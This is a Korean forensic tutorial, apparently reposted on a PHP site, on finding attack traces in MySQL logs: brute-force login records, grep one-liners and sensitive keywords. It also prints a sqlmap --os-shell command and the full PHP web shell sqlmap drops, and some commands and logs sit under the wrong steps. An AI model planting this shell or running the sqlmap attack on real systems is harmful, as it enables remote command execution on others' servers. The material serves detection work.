운영 및 유지보수 안전 데이터베이스 로그를 분석하는 방법

데이터베이스 로그를 분석하는 방법

Jun 11, 2020 pm 05:20 PM
데이터 베이스 통나무

데이터베이스 로그를 분석하는 방법

일반적인 데이터베이스 공격에는 취약한 비밀번호, SQL 주입, 권한 상승, 백업 도난 등이 포함됩니다. 데이터베이스 로그를 분석하여 공격 행위를 발굴하고 공격 시나리오를 추가로 복원하며 공격 소스를 추적할 수 있습니다.

1. Mysql 로그 분석

일반 쿼리 로그는 성공적인 연결과 실행된 각 쿼리를 기록할 수 있으며 이를 보안 배포의 일부로 사용하여 해커 사고 후 실패 분석 또는 조사의 기초를 제공할 수 있습니다.

1. 로그 구성 정보를 확인하세요

show variables like '%general%';
로그인 후 복사

2. 로그 파일 경로를 지정하세요

SET GLOBAL general_log = 'On';
로그인 후 복사

예를 들어 /test.php?id=1을 방문하면 다음 로그가 표시됩니다.

SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';
로그인 후 복사

열별로 분석해 보겠습니다.

첫 번째 열: 시간, 시간 열, 첫 번째 열은 날짜, 마지막 열은 시와 분입니다. 이러한 SQL 문은 거의 1시에 실행되기 때문에 몇 가지 이유는 표시되지 않습니다. 같은 시간이므로 추가 시간은 기록되지 않습니다.

두 번째 열: Id는 show processlist의 첫 번째 열에 있는 스레드 ID입니다. 긴 연결과 시간이 많이 걸리는 SQL 문의 경우 실행 중인 스레드를 정확하게 확인할 수 있습니다.

세 번째 열: 명령, 작업 유형, 예를 들어 Connect는 데이터베이스에 연결하는 것이고 Query는 데이터베이스에 쿼리하는 것입니다(추가, 삭제, 확인 및 수정이 모두 쿼리로 표시됨). 일부 작업은 구체적으로 필터링할 수 있습니다.

네 번째 열: 인수, 세부 정보(예: Connect root@localhost on 은 데이터베이스에 연결한다는 의미 등)는 데이터베이스에 연결한 후 다음 쿼리 작업을 따릅니다.

2. 로그인 성공/실패

이전에 개발한 취약한 비밀번호 도구를 사용하여 사전 설정이 비교적 작습니다. 사용자 2명, 비밀번호 4개, 그룹 8개입니다.

데이터베이스 로그를 분석하는 방법MySQL의 로그 기록은 다음과 같습니다.

190604 14:46:14       14 Connect    root@localhost on
                      14 Init DB    test   
                      14 Query    SELECT * FROM admin WHERE id = 1     
                      14 Quit
로그인 후 복사

이 비밀번호 추측 프로세스에서 어느 것이 성공한지 아시나요?

블라스팅 도구를 사용하면 성공적인 비밀번호 추측 기록은 다음과 같습니다.

Time                 Id        Command         Argument
190601 22:03:20     98 Connect  root@192.168.204.1 on
        98 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
        103 Connect  mysql@192.168.204.1 on       
        103 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
        104 Connect  mysql@192.168.204.1 on       
        104 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
        100 Connect  root@192.168.204.1 on       
        101 Connect  root@192.168.204.1 on       
        101 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)       
        99 Connect  root@192.168.204.1 on        
        99 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
        105 Connect  mysql@192.168.204.1 on       
        105 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
        100 Query  set autocommit=0      
        102 Connect  mysql@192.168.204.1 on       
        102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
        100 Quit
로그인 후 복사

하지만 다른 방법을 사용하면 조금 다를 수 있습니다.

Navicat for MySQL 로그인:

190601 22:03:20     100 Connectroot@192.168.204.1 on
   100 Queryset autocommit=0   
   100 Quit
로그인 후 복사

명령줄 로그인:

190601 22:14:07  106 Connectroot@192.168.204.1 on         
         106 QuerySET NAMES utf8
         106 QuerySHOW VARIABLES LIKE 'lower_case_%'         
         106 QuerySHOW VARIABLES LIKE 'profiling'         
         106 QuerySHOW DATABASES
로그인 후 복사

차이점은 데이터베이스 연결 도구마다 데이터베이스 연결을 위한 초기화 프로세스가 다르다는 것입니다. 이러한 차이를 통해 사용자가 데이터베이스에 연결하는 방법을 간단히 결정할 수 있습니다.

또한 블라스팅 도구, Navicat for MySQL, 명령줄을 사용하는지 여부에 관계없이 로그인 실패 기록은 동일합니다.

로그인 실패 기록:

190601 22:17:25  111 Connectroot@localhost on
         111 Queryselect @@version_comment limit 1
         190601 22:17:56  111 Quit
로그인 후 복사

간단한 분석을 위한 쉘 명령 사용:

어떤 IP가 폭파되고 있나요?

102 Connect  mysql@192.168.204.1 on 
102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
로그인 후 복사

폭발적인 사용자 이름 사전은 무엇인가요?

grep  "Access denied" mysql.log |cut -d "'" -f4|uniq -c|sort -nr
     27 192.168.204.1
로그인 후 복사

로그 분석에서는 테이블 삭제, 데이터베이스 준비, 파일 읽기 및 쓰기 등과 같은 일부 민감한 작업에 특별한 주의를 기울여야 합니다.

키워드: 테이블 삭제, 함수 삭제, 테이블 잠금, 테이블 잠금 해제, load_file(), outfile로, dumpfile로.

민감한 데이터베이스 테이블: SELECT * from mysql.user, SELECT * from mysql.func


3. SQL 인젝션 침입 흔적

SQL 인젝션 취약점을 악용하는 과정에서 sqlmap의 --os-를 사용해 보겠습니다. shell 실수로 셸에서 매개변수를 얻은 경우 sqlmap에 의해 생성된 일부 임시 테이블과 사용자 정의 함수가 남을 수 있습니다. 먼저 sqlmap os-shell 매개변수의 사용법과 원리를 살펴보겠습니다.

1. SQL 주입 지점을 구성하고 Burp가 포트 8080

grep  "Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -
nr     13 mysql     12 root      1 root      1 mysql
로그인 후 복사

을 수신하도록 활성화합니다. HTTP 통신 프로세스는 다음과 같습니다.

데이터베이스 로그를 분석하는 방법 임시 파일 tmpbwyov.php를 생성하고 이 트로이 목마에 액세스하여 시스템 명령을 실행한 후 페이지 표시로 돌아갑니다.

sqlmap.py  -u http://192.168.204.164/sql.php?id=1 --os-shell --proxy=http://127.0.0.1:8080
로그인 후 복사

임시 테이블에 데이터를 쓰는 시스템 명령을 실행하는 저장 프로시저를 호출하여 임시 테이블 sqlmapoutput을 만든 다음 임시 테이블에서 데이터를 가져와 프런트 엔드에 표시했습니다.

웹사이트 디렉터리에서 최근 생성된 의심 파일을 확인하면 SQL 인젝션 취약점 공격이 발생했는지 확인할 수 있습니다.

확인 방법:

1. 웹사이트 디렉터리에 일부 트로이 목마 파일이 있는지 확인:

데이터베이스 로그를 분석하는 방법2. UDF 권한 상승 및 MOF 권한 상승 흔적이 있는지 확인

. 디렉토리

tmpbwyov.php:
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set(&#39;max_execution_time&#39;,0);$z=@ini_get(&#39;disable_functions&#39;);if(!empty($z)){$z=preg_replace(&#39;/[, ]+/&#39;,&#39;,&#39;,$z);$z=explode(&#39;,&#39;,$z);$z=array_map(&#39;trim&#39;,$z);}else{$z=array();}$c=$c." 2>&1n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f(&#39;system&#39;)){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f(&#39;proc_open&#39;)){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f(&#39;shell_exec&#39;)){$w=shell_exec($c);}elseif(f(&#39;passthru&#39;)){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f(&#39;popen&#39;)){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f(&#39;exec&#39;)){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre class="brush:php;toolbar:false">".$w."
로그인 후 복사
";?>`

기능 삭제 여부 확인

mysqllibpluginc:/windows/system32/wbem/mof/
로그인 후 복사

3. 웹 로그 분석과 결합됩니다.

추천 튜토리얼:

웹 서버 보안

위 내용은 데이터베이스 로그를 분석하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

Go 언어는 데이터베이스의 추가, 삭제, 수정 및 쿼리 작업을 어떻게 구현합니까? Go 언어는 데이터베이스의 추가, 삭제, 수정 및 쿼리 작업을 어떻게 구현합니까? Mar 27, 2024 pm 09:39 PM

Go 언어는 효율적이고 간결하며 배우기 쉬운 프로그래밍 언어입니다. 동시 프로그래밍과 네트워크 프로그래밍의 장점 때문에 개발자들이 선호합니다. 실제 개발에서 데이터베이스 작업은 필수적인 부분입니다. 이 기사에서는 Go 언어를 사용하여 데이터베이스 추가, 삭제, 수정 및 쿼리 작업을 구현하는 방법을 소개합니다. Go 언어에서는 일반적으로 사용되는 SQL 패키지, Gorm 등과 같은 타사 라이브러리를 사용하여 데이터베이스를 운영합니다. 여기서는 sql 패키지를 예로 들어 데이터베이스의 추가, 삭제, 수정 및 쿼리 작업을 구현하는 방법을 소개합니다. MySQL 데이터베이스를 사용하고 있다고 가정합니다.

Hibernate는 어떻게 다형성 매핑을 구현합니까? Hibernate는 어떻게 다형성 매핑을 구현합니까? Apr 17, 2024 pm 12:09 PM

Hibernate 다형성 매핑은 상속된 클래스를 데이터베이스에 매핑할 수 있으며 다음 매핑 유형을 제공합니다. Join-subclass: 상위 클래스의 모든 열을 포함하여 하위 클래스에 대한 별도의 테이블을 생성합니다. 클래스별 테이블: 하위 클래스별 열만 포함하는 하위 클래스에 대한 별도의 테이블을 만듭니다. Union-subclass: Joined-subclass와 유사하지만 상위 클래스 테이블이 모든 하위 클래스 열을 통합합니다.

iOS 18에는 손실되거나 손상된 사진을 검색할 수 있는 새로운 '복구된' 앨범 기능이 추가되었습니다. iOS 18에는 손실되거나 손상된 사진을 검색할 수 있는 새로운 '복구된' 앨범 기능이 추가되었습니다. Jul 18, 2024 am 05:48 AM

Apple의 최신 iOS18, iPadOS18 및 macOS Sequoia 시스템 릴리스에는 사진 애플리케이션에 중요한 기능이 추가되었습니다. 이 기능은 사용자가 다양한 이유로 손실되거나 손상된 사진과 비디오를 쉽게 복구할 수 있도록 설계되었습니다. 새로운 기능에는 사진 앱의 도구 섹션에 '복구됨'이라는 앨범이 도입되었습니다. 이 앨범은 사용자가 기기에 사진 라이브러리에 포함되지 않은 사진이나 비디오를 가지고 있을 때 자동으로 나타납니다. "복구된" 앨범의 출현은 데이터베이스 손상으로 인해 손실된 사진과 비디오, 사진 라이브러리에 올바르게 저장되지 않은 카메라 응용 프로그램 또는 사진 라이브러리를 관리하는 타사 응용 프로그램에 대한 솔루션을 제공합니다. 사용자는 몇 가지 간단한 단계만 거치면 됩니다.

HTML이 데이터베이스를 읽는 방법에 대한 심층 분석 HTML이 데이터베이스를 읽는 방법에 대한 심층 분석 Apr 09, 2024 pm 12:36 PM

HTML은 데이터베이스를 직접 읽을 수 없지만 JavaScript 및 AJAX를 통해 읽을 수 있습니다. 단계에는 데이터베이스 연결 설정, 쿼리 보내기, 응답 처리 및 페이지 업데이트가 포함됩니다. 이 기사에서는 JavaScript, AJAX 및 PHP를 사용하여 MySQL 데이터베이스에서 데이터를 읽는 실제 예제를 제공하고 쿼리 결과를 HTML 페이지에 동적으로 표시하는 방법을 보여줍니다. 이 예제에서는 XMLHttpRequest를 사용하여 데이터베이스 연결을 설정하고 쿼리를 보내고 응답을 처리함으로써 페이지 요소에 데이터를 채우고 데이터베이스를 읽는 HTML 기능을 실현합니다.

PHP에서 MySQLi를 사용하여 데이터베이스 연결을 설정하는 방법에 대한 자세한 튜토리얼 PHP에서 MySQLi를 사용하여 데이터베이스 연결을 설정하는 방법에 대한 자세한 튜토리얼 Jun 04, 2024 pm 01:42 PM

MySQLi를 사용하여 PHP에서 데이터베이스 연결을 설정하는 방법: MySQLi 확장 포함(require_once) 연결 함수 생성(functionconnect_to_db) 연결 함수 호출($conn=connect_to_db()) 쿼리 실행($result=$conn->query()) 닫기 연결( $conn->close())

PHP에서 데이터베이스 연결 오류를 처리하는 방법 PHP에서 데이터베이스 연결 오류를 처리하는 방법 Jun 05, 2024 pm 02:16 PM

PHP에서 데이터베이스 연결 오류를 처리하려면 다음 단계를 사용할 수 있습니다. mysqli_connect_errno()를 사용하여 오류 코드를 얻습니다. 오류 메시지를 얻으려면 mysqli_connect_error()를 사용하십시오. 이러한 오류 메시지를 캡처하고 기록하면 데이터베이스 연결 문제를 쉽게 식별하고 해결할 수 있어 애플리케이션이 원활하게 실행될 수 있습니다.

PHP를 사용하여 데이터베이스에서 중국어 왜곡 문자를 처리하기 위한 팁과 사례 PHP를 사용하여 데이터베이스에서 중국어 왜곡 문자를 처리하기 위한 팁과 사례 Mar 27, 2024 pm 05:21 PM

PHP는 웹사이트 개발에 널리 사용되는 백엔드 프로그래밍 언어로, 강력한 데이터베이스 운영 기능을 갖추고 있으며 MySQL과 같은 데이터베이스와 상호 작용하는 데 자주 사용됩니다. 그러나 한자 인코딩의 복잡성으로 인해 데이터베이스에서 잘못된 한자를 처리할 때 문제가 자주 발생합니다. 이 기사에서는 잘못된 문자의 일반적인 원인, 솔루션 및 특정 코드 예제를 포함하여 데이터베이스에서 중국어 잘못된 문자를 처리하기 위한 PHP의 기술과 사례를 소개합니다. 문자가 왜곡되는 일반적인 이유는 잘못된 데이터베이스 문자 집합 설정 때문입니다. 데이터베이스를 생성할 때 utf8 또는 u와 같은 올바른 문자 집합을 선택해야 합니다.

MySQL 데이터베이스 관리 시스템의 기본 원리 분석 MySQL 데이터베이스 관리 시스템의 기본 원리 분석 Mar 25, 2024 pm 12:42 PM

MySQL 데이터베이스 관리 시스템의 기본 원리 분석 MySQL은 데이터 저장 및 관리를 위해 구조화된 쿼리 언어(SQL)를 사용하는 일반적으로 사용되는 관계형 데이터베이스 관리 시스템입니다. 이 글에서는 데이터베이스 생성, 데이터 테이블 설계, 데이터 추가, 삭제, 수정 및 쿼리 등을 포함한 MySQL 데이터베이스 관리 시스템의 기본 원리를 소개하고 구체적인 코드 예제를 제공합니다. 1. 데이터베이스 생성 MySQL에서는 먼저 데이터를 저장할 데이터베이스 인스턴스를 생성해야 합니다. 다음 코드는 "my

See all articles